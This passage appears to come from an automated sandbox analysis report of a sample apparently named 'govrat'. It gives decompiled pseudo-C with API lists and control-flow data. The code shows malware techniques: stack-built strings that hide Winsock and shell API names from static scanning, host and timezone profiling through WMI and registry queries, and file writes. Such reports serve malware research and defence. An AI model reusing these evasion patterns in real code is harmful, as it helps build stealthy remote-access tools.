    				_push( *(_t889 - 0x8c));
    				_push( *(_t889 - 0x98));
    				_push( *(_t889 - 0x88));
    				_push( &(_t886[0x148]));
    				_push( *((intOrPtr*)(_t889 - 0x80)));
    				_push( *(_t889 - 0x30));
    				_push(_t773);
    				_push(_t879);
    				_push( &(_t886[0x88]));
    				_push(_t886[0x2ac]);
    				_push(_t886[0x2ae]);
    				_push(_t886[0x86]);
    				_push(_t886[0x82]);
    				_push(_t886[0x84]);
    				_push(_t851);
    				_push(_t886);
    				_t532 = E00951048(_t889 - 0x460);
    				_t880 =  *((intOrPtr*)(_t889 - 0x470));
    				L00951000( *((intOrPtr*)(_t889 - 0x464)), _t532, _t886[0x80]);
    				_t535 = E00951195(_t851, _t880, _t886, 8);
    				_t826 = _t880;
    				 *0x975978 = _t535;
    				 *((intOrPtr*)(_t535 + 4)) = _t880;
    				_t852 = _t826 + 2;
    				do {
    					_t881 =  *_t826;
    					_t826 = _t826 + 2;
    				} while (_t881 != 0);
    				_t828 = _t826 - _t852 >> 1;
    				_t829 = _t828 + _t828 + 2;
    				 *_t535 = _t828 + _t828 + 2;
    				if( *((intOrPtr*)(_t889 - 0x10)) != 0) {
    					_t540 =  *((intOrPtr*)(_t889 - 0xc));
    					if(_t540 != 0) {
    						_t829 =  *_t540;
    						 *((intOrPtr*)( *_t540 + 8))(_t540);
    					}
    					_t541 =  *((intOrPtr*)(_t889 - 0x14));
    					if(_t541 != 0) {
    						_t829 =  *_t541;
    						 *((intOrPtr*)( *_t541 + 8))(_t541);
    					}
    				}
    				if( *((intOrPtr*)(_t889 - 8)) != 0) {
    					E0095115B(_t829, _t852, _t886,  *((intOrPtr*)(_t889 - 8)));
    					_pop(_t829);
    				}
    				E0095115B(_t829, _t852, _t886,  *(_t889 - 0x9c));
    				_pop(_t830);
    				E0095115B(_t830, _t852, _t886,  *(_t889 - 0x18));
    				_pop(_t831);
    				_t538 = E0095115B(_t831, _t852, _t886, _t886);
    				return _t538;
    			}

    APIs
    • GetProcAddress.KERNEL32 ref: 009641C4
    • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,00000000), ref: 009641DC
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph (image not rendered): basic blocks 965f07-965f0e, 965f14-965fe1 (GetProcAddress * 6), 965fe3-965fe6, 965fe8-965feb, 965fed-965ff0, 965ff2-965ff4, 965ff6-965ff9, 965ffb, 965ffd-965fff
    C-Code - Quality: 100%
    			E00965F07(struct HINSTANCE__* __eax, _Unknown_base(*)()** __edi) {
    				void* _t42;
    				_Unknown_base(*)()* _t43;
    				_Unknown_base(*)()* _t45;
    				_Unknown_base(*)()* _t47;
    				_Unknown_base(*)()* _t49;
    				_Unknown_base(*)()* _t51;
    				_Unknown_base(*)()* _t53;
    				void* _t62;
    
    				 *(_t62 - 4) = __eax;
    				if(__eax == 0) {
    					L7:
    					_t42 = 0;
    				} else {
    					 *(_t62 - 0x30) = 0x53415357;
    					 *((intOrPtr*)(_t62 - 0x2c)) = 0x74726174;
    					 *((short*)(_t62 - 0x28)) = 0x7075;
    					 *((char*)(_t62 - 0x26)) = 0;
    					_t43 = GetProcAddress(__eax, _t62 - 0x30); // executed
    					 *__edi = _t43;
    					 *(_t62 - 0x3c) = 0x43415357;
    					 *((intOrPtr*)(_t62 - 0x38)) = 0x6e61656c;
    					 *((short*)(_t62 - 0x34)) = 0x7075;
    					 *((char*)(_t62 - 0x32)) = 0;
    					_t45 = GetProcAddress( *(_t62 - 4), _t62 - 0x3c); // executed
    					 *(__edi + 4) = _t45;
    					 *(_t62 - 0x18) = 0x74656e69;
    					 *((intOrPtr*)(_t62 - 0x14)) = 0x6464615f;
    					 *((short*)(_t62 - 0x10)) = 0x72;
    					_t47 = GetProcAddress( *(_t62 - 4), _t62 - 0x18); // executed
    					 *(__edi + 8) = _t47;
    					 *(_t62 - 0x4c) = 0x68746567;
    					 *((intOrPtr*)(_t62 - 0x48)) = 0x6274736f;
    					 *((intOrPtr*)(_t62 - 0x44)) = 0x6d616e79;
    					 *((short*)(_t62 - 0x40)) = 0x65;
    					_t49 = GetProcAddress( *(_t62 - 4), _t62 - 0x4c); // executed
    					 *(__edi + 0xc) = _t49;
    					 *(_t62 - 0x24) = 0x74656e69;
    					 *((intOrPtr*)(_t62 - 0x20)) = 0x6f746e5f;
    					 *((short*)(_t62 - 0x1c)) = 0x61;
    					_t51 = GetProcAddress( *(_t62 - 4), _t62 - 0x24); // executed
    					 *(__edi + 0x10) = _t51;
    					 *(_t62 - 0xc) = 0x686f746e;
    					 *((short*)(_t62 - 8)) = 0x6c;
    					_t53 = GetProcAddress( *(_t62 - 4), _t62 - 0xc); // executed
    					 *(__edi + 0x14) = _t53;
    					if( *__edi == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 || _t53 == 0) {
    						goto L7;
    					} else {
    						_t42 = 1;
    					}
    				}
    				return _t42;
    			}


    APIs
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F37
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F59
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F79
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 00965FA0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FC0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FD9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 27 965a5f-965aab call 9bfbd9 30 965b5d 27->30 31 965ab1-965b4d GetProcAddress * 3 27->31 32 965b5f-965b61 30->32 31->30 33 965b4f-965b52 31->33 33->30 34 965b54-965b56 33->34 34->30 35 965b58-965b5b 34->35 35->32
    C-Code - Quality: 94%
    			E00965A5F(_Unknown_base(*)()** __esi) {
    				struct HINSTANCE__* _v8;
    				short _v10;
    				short _v12;
    				short _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				short _v22;
    				char _v24;
    				short _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v46;
    				short _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				char _v88;
    				short _t36;
    				short _t37;
    				short _t38;
    				short _t39;
    				short _t40;
    				short _t41;
    				struct HINSTANCE__* _t44;
    				_Unknown_base(*)()* _t46;
    				_Unknown_base(*)()* _t48;
    				_Unknown_base(*)()* _t50;
    
    				_t36 = 0x53;
    				_v24 = _t36;
    				_t37 = 0x48;
    				_v22 = _t37;
    				_t38 = 0x45;
    				_v20 = _t38;
    				_t39 = 0x4c;
    				_v18 = _t39;
    				_v16 = _t39;
    				_t40 = 0x33;
    				_v14 = _t40;
    				_t41 = 0x32;
    				_v12 = _t41;
    				_v10 = 0;
    				_push( &_v24);
    				_t44 = L009BFBD9( &_v24);
    				_v8 = _t44;
    				if(_t44 == 0) {
    					L5:
    					return 0;
    				}
    				_push(_t55);
    				_v44 = 0x72434853;
    				_v40 = 0x65746165;
    				_v36 = 0x6c656853;
    				_v32 = 0x6574496c;
    				_v28 = 0x6d;
    				_t46 = GetProcAddress(_t44,  &_v44); // executed
    				 *__esi = _t46;
    				_v64 = 0x61504853;
    				_v60 = 0x44657372;
    				_v56 = 0x6c707369;
    				_v52 = 0x614e7961;
    				_v48 = 0x656d;
    				_v46 = 0;
    				_t48 = GetProcAddress(_v8,  &_v64); // executed
    				 *(__esi + 4) = _t48;
    				_v88 = 0x65474853;
    				_v84 = 0x65705374;
    				_v80 = 0x6c616963;
    				_v76 = 0x646c6f46;
    				_v72 = 0x61507265;
    				_v68 = 0x576874;
    				_t50 = GetProcAddress(_v8,  &_v88); // executed
    				 *(__esi + 8) = _t50;
    				if( *__esi == 0 ||  *(__esi + 4) == 0 || _t50 == 0) {
    					goto L5;
    				} else {
    					return 1;
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,?,00974D08), ref: 00965ADF
    • GetProcAddress.KERNEL32(00960300,?), ref: 00965B0F
    • GetProcAddress.KERNEL32(00960300,?), ref: 00965B45
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 71%
    			E00963E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
    				_Unknown_base(*)()* _t96;
    				CHAR* _t98;
    				_Unknown_base(*)()* _t100;
    				short _t102;
    				short _t104;
    				short* _t105;
    				short _t106;
    				short _t110;
    				short _t111;
    				short _t112;
    				short _t113;
    				short _t114;
    				short _t115;
    				short _t116;
    				short _t117;
    				short _t118;
    				short _t119;
    				short _t120;
    				short _t121;
    				short _t122;
    				short _t123;
    				short _t124;
    				short _t126;
    				short _t127;
    				short _t128;
    				short _t129;
    				short _t130;
    				short _t132;
    				short _t134;
    				short _t135;
    				short _t136;
    				signed int _t139;
    				short _t142;
    				short _t144;
    				short _t145;
    				short _t146;
    				short _t148;
    				short _t149;
    				short _t150;
    				short _t151;
    				void* _t156;
    				void* _t157;
    				void* _t160;
    				char _t169;
    				void* _t174;
    				short _t176;
    				intOrPtr* _t178;
    				short* _t179;
    				void* _t180;
    
    				_t178 = __esi;
    				_t175 = __edi;
    				_t174 = __edx;
    				_t169 = __ebx;
    				_t96 = GetProcAddress(__eax, ??); // executed
    				if(_t96 == 0) {
    					L3:
    					_t98 = _t180 - 0x3c;
    					 *((char*)(_t180 - 0x58)) = 0x47;
    					 *((char*)(_t180 - 0x57)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
    					 *((short*)(_t180 - 0x52)) = 0x6c61;
    					 *((char*)(_t180 - 0x50)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
    					 *((short*)(_t180 - 0x4b)) = 0x57;
    					_t100 = GetProcAddress(L00A0C36C(), _t98); // executed
    					 *(_t180 - 8) = _t100;
    					_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
    					if(_t102 == 0) {
    						 *((short*)(_t175 + 0x518)) = _t102;
    					}
    					_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
    					if(_t104 == 0) {
    						 *((short*)(_t175 + 0x538)) = _t104;
    					}
    					 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
    					if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
    						_t110 = 0x53;
    						 *((short*)(_t180 - 0x214)) = _t110;
    						_t111 = 0x45;
    						 *((short*)(_t180 - 0x212)) = _t111;
    						_t112 = 0x4c;
    						 *((short*)(_t180 - 0x210)) = _t112;
    						_t113 = 0x45;
    						 *((short*)(_t180 - 0x20e)) = _t113;
    						_t114 = 0x43;
    						 *((short*)(_t180 - 0x20c)) = _t114;
    						_t115 = 0x54;
    						 *((short*)(_t180 - 0x20a)) = _t115;
    						_t116 = 0x20;
    						 *((short*)(_t180 - 0x208)) = _t116;
    						_t117 = 0x2a;
    						 *((short*)(_t180 - 0x206)) = _t117;
    						_t118 = 0x20;
    						 *((short*)(_t180 - 0x204)) = _t118;
    						_t119 = 0x46;
    						 *((short*)(_t180 - 0x202)) = _t119;
    						_t120 = 0x52;
    						 *((short*)(_t180 - 0x200)) = _t120;
    						_t121 = 0x4f;
    						 *((short*)(_t180 - 0x1fe)) = _t121;
    						_t122 = 0x4d;
    						 *((short*)(_t180 - 0x1fc)) = _t122;
    						_t123 = 0x20;
    						 *((short*)(_t180 - 0x1fa)) = _t123;
    						_t124 = 0x57;
    						_t176 = 0x69;
    						 *((short*)(_t180 - 0x1f8)) = _t124;
    						 *((short*)(_t180 - 0x1f6)) = _t176;
    						_t126 = 0x6e;
    						 *((short*)(_t180 - 0x1f4)) = _t126;
    						_t127 = 0x33;
    						 *((short*)(_t180 - 0x1f2)) = _t127;
    						_t128 = 0x32;
    						 *((short*)(_t180 - 0x1f0)) = _t128;
    						_t129 = 0x5f;
    						 *((short*)(_t180 - 0x1ee)) = _t129;
    						_t130 = 0x54;
    						 *((short*)(_t180 - 0x1ec)) = _t130;
    						 *((short*)(_t180 - 0x1ea)) = _t176;
    						_t132 = 0x6d;
    						 *((short*)(_t180 - 0x1e8)) = _t132;
    						 *((short*)(_t180 - 0x1e6)) = _t169;
    						_t134 = 0x5a;
    						 *((short*)(_t180 - 0x1e4)) = _t134;
    						_t135 = 0x6f;
    						 *((short*)(_t180 - 0x1e2)) = _t135;
    						_t136 = 0x6e;
    						 *((short*)(_t180 - 0x1e0)) = _t136;
    						 *((short*)(_t180 - 0x1de)) = _t169;
    						 *((short*)(_t180 - 0x1dc)) = 0;
    						_t139 = E00951195(_t174, _t176, _t178, 0x2000); // executed
    						 *(_t180 - 8) = _t139;
    						 *_t178(_t180 - 0x28);
    						_t142 = 0x44;
    						 *((short*)(_t180 - 0x1b8)) = _t142;
    						 *((short*)(_t180 - 0x1b6)) = _t169;
    						_t144 = 0x73;
    						 *((short*)(_t180 - 0x1b4)) = _t144;
    						_t145 = 0x63;
    						 *((short*)(_t180 - 0x1b2)) = _t145;
    						_t146 = 0x72;
    						 *((short*)(_t180 - 0x1b0)) = _t146;
    						 *((short*)(_t180 - 0x1ae)) = _t176;
    						_t148 = 0x70;
    						 *((short*)(_t180 - 0x1ac)) = _t148;
    						_t149 = 0x74;
    						 *((short*)(_t180 - 0x1aa)) = _t149;
    						_t150 = 0x6f;
    						 *((short*)(_t180 - 0x1a6)) = _t150;
    						_t151 = 0x6e;
    						 *((short*)(_t180 - 0x1a4)) = _t151;
    						 *((short*)(_t180 - 0x1a2)) = 0;
    						 *((short*)(_t180 - 0x1a8)) = _t176;
    						_t156 = E0095D2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28); // executed
    						if(_t156 != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
    							L00951604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
    						}
    						_t157 = _t180 - 0x28;
    						_push(_t157);
    						_push(_t157); // executed
    						L009E6735(); // executed
    						_t175 =  *((intOrPtr*)(_t180 - 4));
    					}
    					_t105 = E00951195(_t174, _t175, _t178, 0xfffe); // executed
    					_t179 = _t105;
    					_push(_t179);
    					_push(0x7ffe);
    					_push(_t105);
    					_t106 = L00A17B1C(_t105);
    					if(_t106 == 0) {
    						 *_t179 = _t106;
    					}
    					_push(_t180 - 0x7c);
    					_push(_t180 - 0x3c);
    					 *((char*)(_t180 - 0x7c)) = 0x47;
    					 *((char*)(_t180 - 0x7b)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
    					 *((short*)(_t180 - 0x76)) = 0x466b;
    					 *((char*)(_t180 - 0x74)) = 0x72;
    					 *((char*)(_t180 - 0x73)) = _t169;
    					 *((char*)(_t180 - 0x72)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
    					 *((char*)(_t180 - 0x6d)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
    					return L009BA5CA(_t180 - 0x3c);
    				} else {
    					_t160 =  *_t96(0, __edi + 0x390, 4, _t180 - 0x2c); // executed
    					if(_t160 != 0) {
    						goto L3;
    					} else {
    						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
    						L00951667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
    						_push(_t180 - 0x30);
    						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
    						return L00A122E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
    					}
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32 ref: 00963E84
    • GetProcAddress.KERNEL32(00000000,?), ref: 00963F25
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 75 963ed8-963eda 76 963edc-963eef call 951667 75->76 77 963ef2-963f43 call a0c36c GetProcAddress 75->77 76->77 83 963f45 77->83 84 963f4c-963f61 77->84 83->84 86 963f63 84->86 87 963f6a-963f72 84->87 86->87 88 964166-96416b call 951195 87->88 89 963f78-96413d call 951195 call 95d2ff 87->89 93 964170-964181 call a17b1c 88->93 102 96413f-964144 89->102 103 964159-96415e call 9e6735 89->103 98 964183 93->98 99 964186-9641c2 call 9ba5ca 93->99 98->99 102->103 105 964146-964156 call 951604 102->105 107 964163 103->107 105->103 107->88
    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 00963F25
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 163 95355d-953561 164 953563-95356b call 95329c 163->164 165 95356c-9535b4 GetProcAddress * 4 163->165 166 9535cc-9535eb 165->166 167 9535b6-9535bd 165->167 171 9535f0-9535f5 call a01e19 166->171 167->166 170 9535bf-9535c6 167->170 170->166 172 9535c8-9535ca 170->172 172->166 172->171
    C-Code - Quality: 100%
    			E0095355D(struct HINSTANCE__* __eax, void* __ebx, void* __ecx, void* __esi) {
    				_Unknown_base(*)()* _t2;
    				_Unknown_base(*)()* _t3;
    				_Unknown_base(*)()* _t4;
    				void* _t11;
    				struct HINSTANCE__* _t12;
    				_Unknown_base(*)()* _t16;
    
    				_t11 = __ecx;
    				_t12 = __eax;
    				if(__eax != 0) {
    					_t2 = GetProcAddress(__eax, "FlsAlloc"); // executed
    					 *0x9738d4 = _t2; // executed
    					_t3 = GetProcAddress(_t12, "FlsGetValue"); // executed
    					 *0x9738d8 = _t3; // executed
    					_t4 = GetProcAddress(_t12, "FlsSetValue"); // executed
    					 *0x9738dc = _t4; // executed
    					_t5 = GetProcAddress(_t12, "FlsFree"); // executed
    					_t16 =  *0x96c194;
    					 *0x9738e0 = _t5;
    					if( *0x9738d4 == 0 ||  *0x9738d8 == 0 ||  *0x9738dc == 0 || _t5 == 0) {
    						 *0x9738d8 =  *0x96c198;
    						_t5 =  *0x96c190;
    						 *0x9738d4 = 0x95325f;
    						 *0x9738dc = _t16;
    						 *0x9738e0 =  *0x96c190;
    					}
    					return L00A01E19(_t5, _t11);
    				}
    				L0095329C(__ebx);
    				return 0;
    			}

    APIs
    • GetProcAddress.KERNEL32(?,FlsAlloc), ref: 00953579
    • GetProcAddress.KERNEL32(?,FlsGetValue,?,FlsAlloc), ref: 00953586
    • GetProcAddress.KERNEL32(?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 00953593
    • GetProcAddress.KERNEL32(?,FlsFree,?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 009535A0
      • Part of subcall function 0095329C: TlsFree.KERNEL32(00000016), ref: 009532C7
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 46%
    			E00960EDD(intOrPtr __eax, struct _SECURITY_ATTRIBUTES* __ebx, void* __edx, long __edi, intOrPtr* __esi) {
    				signed char _t47;
    				void* _t49;
    				void* _t51;
    				struct _SECURITY_ATTRIBUTES* _t52;
    				void* _t63;
    				struct _SECURITY_ATTRIBUTES* _t70;
    				signed char _t71;
    				void* _t73;
    				void* _t75;
    				struct _SECURITY_ATTRIBUTES* _t80;
    				void* _t84;
    				void* _t87;
    				void* _t89;
    				long _t90;
    				intOrPtr* _t92;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    
    				_t92 = __esi;
    				_t90 = __edi;
    				_t89 = __edx;
    				_t80 = __ebx;
    				 *((intOrPtr*)(_t96 - 0x10)) = __eax;
    				_t47 = 0x60000a -  *((intOrPtr*)(_t96 - 0x10));
    				 *(_t96 + 8) = 0x60000a;
    				if((_t47 & 0x00000007) != 0) {
    					do {
    						_t47 = _t47 + 1;
    					} while ((_t47 & 0x00000007) != 0);
    					 *(_t96 + 8) = _t47;
    				}
    				_t106 = _t47 - _t80;
    				if(_t47 <= _t80) {
    					CloseHandle( *(_t96 - 8));
    				} else {
    					_t51 = E009602B6(0x974f18, _t106);
    					_push( *(_t96 + 8));
    					if(_t51 != 0) {
    						_t52 = E0095DD70(_t89, _t90, _t96);
    						_push(_t96 - 0x10);
    						_push( *(_t96 + 8));
    						 *(_t96 - 0xc) = _t52;
    						_push(_t52);
    						 *(_t96 + 8) = L0095DC6C(_t80, _t90, _t92,  *(_t96 - 8));
    						L0095C788(_t96 - 0x10, _t89, _t92,  *(_t96 - 0xc));
    						__eflags =  *(_t96 + 8) - _t80;
    						if( *(_t96 + 8) != _t80) {
    							CloseHandle( *(_t96 - 8));
    							 *((short*)(_t96 - 0x2cc)) = 0;
    							L00958BA0(_t96 - 0x2ca, _t80, 0x206);
    							_push(_t96 - 0x2cc);
    							L0095F4BA(_t80, _t90, _t92);
    							_pop(_t84);
    							_t94 =  *_t92(_t96 - 0x2cc, 0xc0000000, 3, _t80, 4, _t90, _t80);
    							__eflags = _t94 - 0xffffffff;
    							if(__eflags != 0) {
    								_push(_t80);
    								_t63 = _t96 - 0xc;
    								_push(_t63);
    								_push( *((intOrPtr*)(_t96 - 0x10)));
    								 *(_t96 - 0xc) = _t80;
    								_push( *(_t96 + 8));
    								_push(_t94);
    								_push(_t63);
    								L00995FEF(_t63, _t80, __eflags);
    								CloseHandle(_t94);
    								_push(_t96 + 8);
    								_push( *(_t96 - 0x14));
    								_push(_t96 - 0x2cc);
    								L009621C1(_t80, _t84, _t89, _t90, _t94, __eflags);
    								L00961F7B(_t80, _t89, _t90, _t94, __eflags,  *(_t96 + 8));
    								ExitProcess(_t80);
    							}
    						}
    					} else {
    						 *(_t96 - 0xa4) = _t80;
    						_t70 = E0095DD70(_t89, _t90, _t96);
    						_t87 = _t96 - 0x10;
    						_push(_t87);
    						_push( *(_t96 + 8));
    						 *(_t96 - 0xc) = _t70;
    						_push(_t70);
    						_t71 = L0095DC6C(_t80, _t90, _t92,  *(_t96 - 8)); // executed
    						 *(_t96 + 8) = _t71;
    						CloseHandle( *(_t96 - 8));
    						_t73 = CreateFileW( *(_t96 - 0x14), 2, 3, _t80, 3, _t90, _t80); // executed
    						_t95 = _t73;
    						if( *(_t96 + 8) != _t80) {
    							_push(_t80);
    							_push(_t80);
    							_push(_t80);
    							_push(_t95);
    							_push(_t90); // executed
    							_t75 = L009D3C0F(_t73); // executed
    							_t109 = _t75 - 0xffffffff;
    							if(_t75 != 0xffffffff) {
    								_push(_t80);
    								_push(_t96 - 0xa4);
    								_push( *((intOrPtr*)(_t96 - 0x10)));
    								_push( *(_t96 + 8));
    								_push(_t95);
    								_push(_t87); // executed
    								L009E4037(_t96 - 0xa4, _t87, _t95, _t109); // executed
    								CloseHandle(_t95);
    							}
    							L0095C788(_t87, _t89, _t95,  *(_t96 + 8)); // executed
    							_pop(_t87);
    						}
    						L0095C788(_t87, _t89, _t95,  *(_t96 - 0xc)); // executed
    					}
    				}
    				_t49 = 0x2b;
    				return _t49;
    			}

    APIs
    • CloseHandle.KERNEL32(?), ref: 00960F3C
    • CreateFileW.KERNEL32(?,00000002,00000003,?,00000003), ref: 00960F4E
    • CloseHandle.KERNEL32(00000000), ref: 00960F7C
    • CloseHandle.KERNEL32(?), ref: 00960FCC
    • CloseHandle.KERNEL32(00000000), ref: 0096102F
      • Part of subcall function 00961F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 0096212D
    • ExitProcess.KERNEL32 ref: 00961055
    • CloseHandle.KERNEL32(?), ref: 0096105E
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 246 95d775-95d777 247 95d779-95d810 RegQueryValueExW 246->247 248 95d71f-95d722 246->248 247->248 249 95d816-95d8d7 RegQueryValueExW 247->249 250 95d724-95d72c call 99f7c9 248->250 251 95d730-95d751 call 99ba8e 248->251 252 95d8d9-95d8e0 249->252 253 95d8e6-95d954 RegQueryValueExW 249->253 252->248 252->253 253->248 256 95d95a-95da26 call 951667 RegQueryValueExW 253->256 261 95da69-95da85 call 951f39 256->261 262 95da28-95da66 call 951f39 * 3 256->262 267 95dabf 261->267 268 95da87-95da8d 261->268 262->261 270 95dac2-95dacb 267->270 271 95da90-95da99 268->271 270->270 274 95dacd-95dadc 270->274 271->271 275 95da9b-95dabd call 951d71 call 958ba0 271->275 276 95dadf-95dae8 274->276 285 95db06-95db0c 275->285 276->276 280 95daea-95dafc call 951d71 276->280 284 95db01-95db03 280->284 284->285 286 95db0f-95db18 285->286 286->286 287 95db1a-95db37 call 951f39 286->287 287->248
    C-Code - Quality: 93%
    			E0095D775(void* __eax, void* __ebx, void* __edi, void* __esi) {
    				void* _t118;
    				void* _t119;
    				void* _t121;
    
    				_t119 = __edi;
    				_t118 = __ebx;
    				_t113 = __eax;
    				if(__eax == 0) {
    					__eax = 0x50;
    					 *(__ebp - 0x98) = __ax;
    					__eax = 0x61;
    					 *(__ebp - 0x96) = __ax;
    					__eax = 0x72;
    					 *(__ebp - 0x94) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x92) = __ax;
    					__eax = 0x6e;
    					 *(__ebp - 0x90) = __ax;
    					__eax = 0x74;
    					 *(__ebp - 0x8e) = __ax;
    					__eax = 0x4b;
    					 *(__ebp - 0x8c) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x8a) = __ax;
    					__eax = 0x79;
    					 *(__ebp - 0x88) = __ax;
    					__eax = 0x4e;
    					 *(__ebp - 0x86) = __ax;
    					__eax = 0x61;
    					 *(__ebp - 0x84) = __ax;
    					__eax = 0x6d;
